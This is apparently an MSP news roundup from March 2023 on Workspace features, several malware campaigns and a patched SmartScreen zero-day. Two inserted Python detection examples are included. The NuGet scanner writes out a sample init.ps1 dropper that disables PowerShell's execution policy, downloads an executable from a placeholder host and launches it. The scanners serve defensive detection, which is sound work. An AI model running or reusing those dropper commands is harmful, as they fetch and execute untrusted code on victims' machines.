News You Might’ve Missed. March 2023

What's New This Month in the News for MSPs?
Google says new smart chip features are coming to Workspace; new forms of malware from Asian attack group targeting companies; new PowerMagic and CommonMagic malware stealing data for hackers; hackers targeting DotNet developers using malicious NuGet packages; and more.

Let's see what it's all about.

Google Says New Smart Chip Features Are Coming to Workspace

Google LLC announced this month that a new set of features is rolling out to Google Workspace, designed to help users save time.

The new features will be released over the next few weeks, although Google previewed them at its Cloud Next conference last year. Many of the new capabilities build on smart chips, which Google introduced in 2021. These chips let users embed interactive elements like charts and data tables into their documents.

Google Docs is getting two new smart chips. One will let users embed a virtual stopwatch in their documents, while another gives a prepackaged calendar invite template. Once the template is completed, users can click a button that lets it sync with their Google Calendar automatically.

While these are basic, customers with more advanced requirements can create their own custom smart chips tailored to their specific needs. For example, dev teams can create a smart chip to make a to-do list of their tasks.

Google says it is also extending the Google Docs feature set in other directions. For example, the ability to embed emojis and upvote content in documents is coming soon. It is also adding enhancements to support templates: users can create placeholder fields in a Google Doc and replace them with a data point later.

Google Sheets hasn't been left out in these updates. New additions to Sheets will let users embed data about stock tickers, currencies, and mutual funds into a spreadsheet. For example, when a user clicks the stock ticker, a pop-up panel appears that provides the current share price.

This update launches a new integration with Google Maps. Where a spreadsheet field contains the name of a location, a click reveals a pop-up that shows the location on a map.

In addition to launching these new features, Google has made several changes to the Google Workspace interface. Among these is a streamlined search bar for Google Drive that lets users filter documents based on file type and other criteria.

New Forms of Malware From Asian Attack Group Targeting Companies

A South Asia-based attack group has been targeting businesses globally using new forms of malware to steal data.

Researchers at Elastic Security Labs are tracking the activity as "REF2924" and say the group is well known for its malware. The first malware detected by the researchers is an executable named Wmdtc[.]exe and dubbed NAPLISTENER, which was found in January. A second new form of malware, using the file name kavUpdate[.]exe and dubbed SOMNIRECORD, was discovered in February.

Wmdtc[.]exe is installed as a Windows service and uses a naming convention very similar to the legitimate binary used by the Microsoft Distributed Transaction Coordinator service. The researchers chose the name NAPLISTENER because the malware has an HTTP listener built into it, written in C#. SOMNIRECORD (kavUpdate[.]exe) is written in .NET and works as a simple loader.

Researchers say both NAPLISTENER and SOMNIRECORD are significant because they rely on open-source code projects that provide most or all of their capabilities. These projects not only help obscure the adversary and their capabilities but also reduce the effort required to develop those capabilities.

Additionally, both malware families were seen leveraging expected and legitimate protocols. For example, SOMNIRECORD leverages DNS, while NAPLISTENER uses HTTP, which helps them avoid network detection.

SOMNIRECORD and NAPLISTENER were observed together with SIESTAGRAPH, which also posed as a legitimate file to avoid detection. All three were deployed in environments with network-based visibility where endpoint protection wasn't standard. This threat operator has at least a moderate familiarity with the Asia region's security posture.

Additionally, researchers noted that REF2924 installed webshells, which are backdoors served through a web server and typically written in web languages. Based on similar code seen in these webshells, researchers say they also appear to be borrowed or repurposed from open-source projects, and note that this is a typical method used by many threat operators.

Reviewing the development and deployment history of SOMNIRECORD, the researchers suspect that it was created in response to eviction attempts by targeted businesses. This has led to a change in the threat actor's priorities, moving away from data theft toward contingency planning.

Following their research and investigation into this malware, the researchers say that threat operators will continue to deploy it against targets using malicious IIS modules, webshells, and in-line proxy relays.

New PowerMagic and CommonMagic Malware Stealing Data for Hackers

Security analysts say they've found attacks from an advanced threat group using a malicious framework called CommonMagic, with a new backdoor called PowerMagic that they've never seen before.

The two components have been active since September 2021 in attacks that are continuing. The targets are businesses in the administrative, transportation, and agriculture sectors, and the goal is espionage.

Once they gain access to a target's network, the hackers behind the CommonMagic espionage campaign use separate plugins to steal documents and data files (XLS, DOCX, DOC, XLSX, RTF, ODS, ODT, RAR, ZIP, PDF, TXT) from USB devices.

Additionally, the malware can take screenshots using the Windows Graphics Device Interface (GDI) API every 3 seconds. According to the researchers, the hackers' initial access vector is spear phishing or a similar method that delivers a website URL pointing to a ZIP archive containing a malicious LNK file.

According to Kaspersky, when the malicious LNK is activated, it begins infecting the device with a previously undetected PowerShell-based backdoor, which the researchers dubbed PowerMagic after a string in its code.

The backdoor connects to the command-and-control (CNC) server, retrieves its instructions, and then uploads the results using Dropbox and OneDrive folders.

After the PowerMagic infection, the hackers deployed CommonMagic, a framework containing many malicious tools that the researchers say they had not seen before.

Additionally, the analysis of the infection revealed that the threat actors had dedicated modules for many tasks, from communicating with the CNC server to decrypting and encrypting traffic from it, taking screenshots, and stealing documents.

They also use a OneDrive folder to exchange data with the CNC server, and they encrypt the files using the RC5Simple open-source library with a custom sequence at the beginning of the encryption – Hwo7X8p.

Hackers Targeting DotNet Developers Using Malicious NuGet Packages

.Net developers are being targeted by threat actors who infect them with cryptocurrency stealers distributed through the NuGet repository, impersonating many genuine packages via typosquatting.

According to the JFrog security researchers who discovered this campaign, three of the infected packages have been downloaded over 150,000 times in a month.

While some say the vast number of downloads points to the many .Net developers with compromised systems, others think another explanation could be that it's the attackers' efforts to legitimize the malicious NuGet packages.

The threat actors created NuGet repository profiles that used typosquatting to impersonate accounts of Microsoft software developers working on the NuGet .Net package manager.

The malicious packages download and run a PowerShell-based dropper script called init.ps1. This script configures the compromised device to let PowerShell run without restrictions, then downloads and runs a custom Windows executable as a second-stage payload.
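As an added example (not JFrog's or NuGet's own tooling), the following Python script inspects a .nupkg archive for install-time PowerShell scripts showing the dropper traits described above: relaxing the execution policy, fetching a remote file, and launching an executable. The sample package it builds is constructed for illustration and uses a placeholder URL.

```python
"""Inspect a .nupkg (a zip archive) for install-time PowerShell scripts with
dropper-like behaviour. Added example, not JFrog's or NuGet's own tooling;
the sample package below is constructed and is not a real NuGet package."""
import io
import re
import zipfile

# Traits a defender would flag in an install-time script. The first two mirror the
# behaviour described in the article: relaxing PowerShell's execution policy, then
# fetching and launching a second-stage executable.
SUSPICIOUS_PATTERNS = {
    "execution_policy_bypass": re.compile(r"Set-ExecutionPolicy\s+(Unrestricted|Bypass)", re.I),
    "remote_download": re.compile(r"(Invoke-WebRequest|DownloadFile|Net\.WebClient|\biwr\b|\bcurl\b)", re.I),
    "launch_executable": re.compile(r"(Start-Process|\.exe\b)", re.I),
}

def scan_nupkg(data: bytes) -> dict:
    """Return {script_path: [finding, ...]} for every PowerShell script in the package."""
    findings = {}
    with zipfile.ZipFile(io.BytesIO(data)) as pkg:
        for name in pkg.namelist():
            if not name.lower().endswith((".ps1", ".psm1")):
                continue
            text = pkg.read(name).decode("utf-8", errors="replace")
            hits = [label for label, rx in SUSPICIOUS_PATTERNS.items() if rx.search(text)]
            # tools/init.ps1 is run by the Visual Studio Package Manager Console when
            # the package is installed, so its mere presence deserves attention.
            if name.lower() == "tools/init.ps1":
                hits.insert(0, "auto_run_install_script")
            findings[name] = hits
    return findings

def build_sample_package() -> bytes:
    """Constructed sample resembling the dropper the article describes (not a real package)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as pkg:
        pkg.writestr("Example.Typo.nuspec", "<package><metadata><id>Example.Typo</id></metadata></package>")
        pkg.writestr("tools/init.ps1",
                     "Set-ExecutionPolicy Unrestricted -Scope CurrentUser -Force\n"
                     "Invoke-WebRequest 'http://EXAMPLE-PLACEHOLDER/stage2.exe' -OutFile $env:TEMP\\u.exe\n"
                     "Start-Process $env:TEMP\\u.exe\n")
        pkg.writestr("tools/install.ps1", "Write-Host 'installing'\n")  # benign script for contrast
    return buf.getvalue()

if __name__ == "__main__":
    for path, hits in scan_nupkg(build_sample_package()).items():
        print(path, "->", ", ".join(hits) or "clean")
```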

The researchers say this is a new approach, compared to other threat actors who typically use commodity malware and open-source hacking tools rather than making their own payloads.

These payloads are typically not detected as malicious by Microsoft Defender and are part of a larger malicious scheme.

Emotet Malware Used in Microsoft OneNote Files to Hide From Detection

Researchers now see the Emotet malware distributed via Microsoft OneNote email attachments to evade Microsoft's security restrictions and compromise more targets.

Historically, campaigns distributed the Emotet botnet malware through Microsoft Excel and Word attachments containing malicious macros. When a target user opens the infected file and enables macros, a DLL that installs the malware on the system is downloaded and run.

Once loaded, Emotet steals email content and mail contacts for possible spam campaigns.

Additionally, the malware downloads more payloads that provide initial entry to the corporate network. This access is then used to run cyberattacks against the business, which may include data theft, ransomware attacks, extortion, and cyber espionage.

In the past, Emotet was one of the most widely distributed malware families; during the past year, researchers noted a change in its activity, with periodic starts and stops. By the end of 2022, it seemed to be taking a break, but this was a temporary lull and, three months later, the botnet was back to sending malicious emails globally.

Researchers say this latest attempt was flawed because it continued using Excel and Word documents, although Microsoft now automatically blocks macros in them.

Many observers suggested that the threat actors behind Emotet would soon move to OneNote documents, and recently a security researcher discovered a new campaign using them. The attachments arrive in reply-chain emails posing as how-tos, guides, job references, invoices, etc.

When a recipient attempts to open an attached malicious OneNote document, a message claims that the document is protected and prompts the user to double-click the View button so the document displays correctly.

In the current Emotet campaign, a malicious VBScript file called click.wsf is embedded behind the View button. The VBScript contains a heavily obfuscated script which downloads a DLL file from an external, compromised website URL and then launches it.

Microsoft OneNote displays a warning when a user tries to run an embedded file. Users typically click OK to dismiss the alert, and when they do, the VBScript is executed with WScript.exe from OneNote's Temp folder. This folder differs from user to user.

The Emotet malware is then downloaded as a DLL, as seen on VirusTotal, and stored in the same location. It uses regsvr32.exe to run the randomly named DLL.

After this, Emotet runs silently on the system, stealing contacts and emails while waiting for further commands from the CNC server.
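The process chain just described (OneNote launching WScript.exe on a script in its Temp folder, which then runs regsvr32.exe on a DLL in the same place) is something endpoint telemetry can catch. The following Python is an added example, not from the original article or any vendor: it runs that detection logic over constructed process-creation events with Sysmon-style field names; the Temp path, file names and PIDs are assumed for illustration.

```python
"""Flag the OneNote -> WScript.exe -> regsvr32.exe chain in process-creation events.
Added example, not from the original article; the events below are constructed,
with Sysmon Event ID 1-style field names and an assumed OneNote Temp path."""
import re
from pathlib import PureWindowsPath

# Constructed sample events: parent image, image, command line.
EVENTS = [
    {"pid": 4100, "ppid": 900, "parent": r"C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE",
     "image": r"C:\Windows\System32\wscript.exe",
     "cmd": r'"C:\Windows\System32\wscript.exe" "C:\Users\alice\AppData\Local\Temp\OneNote\16.0\Exported\{ABCD}\NT\0\click.wsf"'},
    {"pid": 4188, "ppid": 4100, "parent": r"C:\Windows\System32\wscript.exe",
     "image": r"C:\Windows\System32\regsvr32.exe",
     "cmd": r'regsvr32.exe /s "C:\Users\alice\AppData\Local\Temp\OneNote\16.0\Exported\{ABCD}\NT\0\zX9qLm.dll"'},
    {"pid": 5020, "ppid": 900, "parent": r"C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE",
     "image": r"C:\Windows\System32\notepad.exe", "cmd": "notepad.exe notes.txt"},  # benign, for contrast
]

# Assumed location of OneNote's per-user Temp folder for embedded files.
TEMP_ONENOTE = re.compile(r"\\AppData\\Local\\Temp\\OneNote\\", re.I)
SCRIPT_EXT = re.compile(r"\.(wsf|vbs|js)\b", re.I)

def basename(path: str) -> str:
    return PureWindowsPath(path).name.lower()

def detect_chain(events: list) -> list:
    """Return one alert per script host spawned by OneNote from its Temp folder,
    recording whether that process went on to register a DLL via regsvr32."""
    by_ppid = {}
    for ev in events:
        by_ppid.setdefault(ev["ppid"], []).append(ev)
    alerts = []
    for ev in events:
        if basename(ev["parent"]) != "onenote.exe":
            continue
        if basename(ev["image"]) not in {"wscript.exe", "cscript.exe"}:
            continue
        if not (TEMP_ONENOTE.search(ev["cmd"]) and SCRIPT_EXT.search(ev["cmd"])):
            continue
        # Second stage: the script host's children that hand a DLL to regsvr32.exe.
        followups = [c for c in by_ppid.get(ev["pid"], [])
                     if basename(c["image"]) == "regsvr32.exe" and re.search(r"\.dll\b", c["cmd"], re.I)]
        alerts.append({"pid": ev["pid"], "stage": "script_host_from_onenote_temp",
                       "dll_loaded_via_regsvr32": bool(followups)})
    return alerts

if __name__ == "__main__":
    for alert in detect_chain(EVENTS):
        print(alert)
```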

Since Microsoft OneNote has become a malware distribution problem of significant proportions, Microsoft is planning to add enhancements to OneNote that will protect against phishing attacks. A release date for the update isn’t yet available.

Windows Zero-Day Exploit Used in the Magniber Ransomware Attacks Has Been Patched

Microsoft recently patched a zero-day bug that attackers used to bypass the Windows SmartScreen cloud-based anti-malware service, letting them run Magniber ransomware payloads without detection.

The bug, tracked as CVE-2023-24880, was exploited using malicious MSI files signed with a custom Authenticode signature.

Although the signature was invalid, it was enough to fool SmartScreen, so the Mark-of-the-Web (MotW) security warnings that normally alert users to take precautions when opening files from the Internet never appeared.

Google's Threat Analysis Group discovered the CVE-2023-24880 zero-day vulnerability on February 15th and reported it to Microsoft.

Magniber ransomware has been active since October 2017 and is the successor to Cerber ransomware. It initially targeted South Korea but has since expanded to global targets, including Taiwan, China, Malaysia, Singapore, Hong Kong, and Europe.

That's a Wrap for News You Might've Missed

I hope this update has been helpful. MSP360 is your resource for MSP news. Stay home, stay safe and healthy, and remember to check back next month for more highlights.
